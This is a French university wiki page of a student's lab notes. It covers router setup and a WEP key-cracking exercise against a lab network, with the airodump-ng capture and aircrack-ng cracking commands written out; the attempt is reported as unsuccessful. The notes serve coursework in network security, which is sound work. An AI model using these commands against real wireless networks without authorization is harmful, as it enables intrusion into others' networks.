Atelier SysRes SE4 2023/2024 E7

De wiki-se.plil.fr
Révision datée du 17 avril 2024 à 19:39 par Abecquet (discussion | contributions) (Page créée avec « == Architecture réseau, finalisation == Configuration pour le Ping sur 193.48.57.162 Configuration SSH vers l'ISR G4Router == Cassage de clef WEP == Mise en mode monitor de l'interface wlp1s0 sur ma machine. Récupération de l'@MAC du ssid cracotte4 avec la commande: sudo airodump-ng wlp1s0 Récupération des paquet dans les fichiers g4-crack-*.cap avec la commande : sudo airodump-ng -c 3 -b 04:DA:D2:9C:50:53 -w g4-crack wlp1s0 Cette commande tour... »)
(diff) ← Version précédente | Voir la version actuelle (diff) | Version suivante → (diff)
Aller à la navigation Aller à la recherche

Architecture réseau, finalisation

Configuration pour le Ping sur 193.48.57.162

Configuration SSH vers l'ISR G4Router

Cassage de clef WEP

Mise en mode monitor de l'interface wlp1s0 sur ma machine.

Récupération de l'@MAC du ssid cracotte4 avec la commande:

   sudo airodump-ng wlp1s0

Récupération des paquet dans les fichiers g4-crack-*.cap avec la commande :

   sudo airodump-ng -c 3 -b 04:DA:D2:9C:50:53 -w g4-crack wlp1s0

Cette commande tournera en fond pour récupérer le plus d'IVs possible.

Enfin pour tester les mot des passes nous faisons :

   sudo aircrack-ng -b 04:DA:D2:9C:50:53 g4-crack-*.cap

La capture étant extrêmement longue et après avoir attendu plus de 40 min je n'avais que 4100 paquets. Cela était insuffisant pour cassé le mot de passe, donc sans succès.

Cassage de mot de passe WPA-PSK